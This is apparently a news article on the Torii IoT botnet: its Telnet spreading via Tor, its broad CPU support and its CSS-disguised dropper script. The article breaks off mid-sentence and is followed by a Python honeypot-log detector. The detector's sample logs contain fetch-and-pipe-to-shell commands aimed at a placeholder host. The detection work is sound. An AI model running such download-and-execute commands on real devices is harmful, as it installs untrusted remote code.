Security researchers discovered a new IoT botnet that is in a league superior to the Mirai variants that rise and fall on a daily basis.
The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.
Communication with the command and control (C2) servers is encrypted, and capabilities include exfiltration and command execution.
According to research from Avast, the malware has been active since at least December 2017 and targets devices on several CPU architectures, including MIPS, ARM, x86, x64, PowerPC, and SuperH.
Although multi-platform support is common among Mirai-based threats, the researchers say Torii supports one of the largest sets of architectures they’ve seen so far.
Telnet attacks coming through Tor
Respected security researcher Dr. Vesselin Bontchev caught a sample of this malware in his Telnet honeypot. He noticed that the attack arrived on port 23, the Telnet port, but that the communication was tunneled through the Tor network, a detail that inspired Avast's name for the botnet.
My honeypot just caught something substantially new. Spreads via Telnet but not your run-of-the-mill Mirai variant or Monero miner…
First stage is just a few commands that download a rather sophisticated shell script, disguised as a CSS file. (URL is still live.) pic.twitter.com/r5L0I8PC0h
— Vess (@VessOnSecurity) September 19, 2018
Torii infects systems that have Telnet exposed and protected by weak credentials. It executes a sophisticated script that determines the architecture of the device, and…
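As an added detection example (not code from this article, from Avast, or from Dr. Bontchev's honeypot), the following Python scans constructed Telnet honeypot session logs for the chain described above: a command that fetches a URL ending in .css and runs it through a shell, an architecture probe, and a source address on a Tor exit-node list. The log format, the hostnames, the addresses and the exit-node set are all assumptions built for the example.

```python
import re
from dataclasses import dataclass

# Constructed Telnet honeypot session log lines (not from the article or Avast's report).
# Assumed format: "<timestamp> <session-id> <src-ip> CMD <command line>"
SAMPLE_LOG = """\
2018-09-19T10:02:11Z s1 198.51.100.7 CMD enable
2018-09-19T10:02:12Z s1 198.51.100.7 CMD cd /tmp; wget http://example.invalid/style.css -O .x; sh .x
2018-09-19T10:05:40Z s2 203.0.113.9 CMD cat /proc/cpuinfo
2018-09-19T10:05:41Z s2 203.0.113.9 CMD curl -s http://example.invalid/static/theme.css | sh
2018-09-19T10:09:03Z s3 192.0.2.44 CMD ls -la
"""

# Constructed stand-in for a Tor exit-node feed; a real deployment would load the
# published exit list. One of the sample sources is marked as an exit node.
TOR_EXIT_NODES = {"198.51.100.7"}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+CMD\s+(.*)$")
# A downloader followed (within the same shell command) by a URL ending in .css.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp)\b[^;|&]*?(\S+\.css)\b", re.IGNORECASE)
# The fetched file is handed to a shell or made executable and run.
EXEC_RE = re.compile(r"(?:\|\s*(?:sh|bash|busybox\s+sh)\b|\bsh\s+\S+|chmod\s+\+?x\b|\./\S+)")
# Common ways a dropper learns the device's CPU architecture.
ARCH_RE = re.compile(r"/proc/cpuinfo|\buname\s+-m\b")


@dataclass
class Finding:
    session: str
    src_ip: str
    reasons: list


def analyze_sessions(log_text):
    """Return one Finding per session whose commands fetch a '.css'-disguised file
    and execute it; architecture probing and a Tor exit origin are added as context."""
    sessions = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        _ts, sid, ip, cmd = m.groups()
        sessions.setdefault((sid, ip), []).append(cmd)
    findings = []
    for (sid, ip), cmds in sessions.items():
        joined = "\n".join(cmds)
        fetch = FETCH_RE.search(joined)
        if not (fetch and EXEC_RE.search(joined)):
            continue  # only sessions that both download and run a .css payload are reported
        reasons = [f"fetched and executed css-disguised payload {fetch.group(1)}"]
        if ARCH_RE.search(joined):
            reasons.append("architecture probe in session")
        if ip in TOR_EXIT_NODES:
            reasons.append("source is a Tor exit node")
        findings.append(Finding(sid, ip, reasons))
    return findings
```

Running `analyze_sessions(SAMPLE_LOG)` reports sessions s1 and s2 and leaves the benign s3 alone.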